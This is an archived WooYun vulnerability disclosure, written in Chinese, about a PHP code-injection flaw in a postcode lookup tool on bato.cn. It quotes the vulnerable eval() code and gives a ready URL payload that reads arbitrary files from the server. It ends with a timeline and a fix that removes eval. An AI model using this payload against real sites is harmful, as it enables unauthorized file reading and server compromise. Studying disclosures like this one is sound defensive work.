乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-03-02: 厂商已经主动忽略漏洞,细节向公众公开
switch ($_GET['w']){ case "sheng": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");"); break; case "diqu": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");"); break; case "shi": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");"); break; case "cun": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");"); break; case "youbian": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");"); break; case "quhao": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");"); break; default: @eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");"); break; }
http://www.bato.cn/tool/youbian?q=%24%7B%40exit%28print_r%28file%28%24_GET%5Bd%5D%29%29%29%7D原来代码中,$keyword是输入的搜索内容,可以直接拼入php代码
for ($ai=0; $ai<$dreamcount; $ai++){ switch ($_GET['w']){ case "sheng": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");"); break; case "diqu": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");"); break; case "shi": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");"); break; case "cun": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");"); break; case "youbian": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");"); break; case "quhao": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");"); break; default: @eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");"); break; }
禁止使用eval函数,去除敏感代码。
未能联系到厂商或者厂商积极拒绝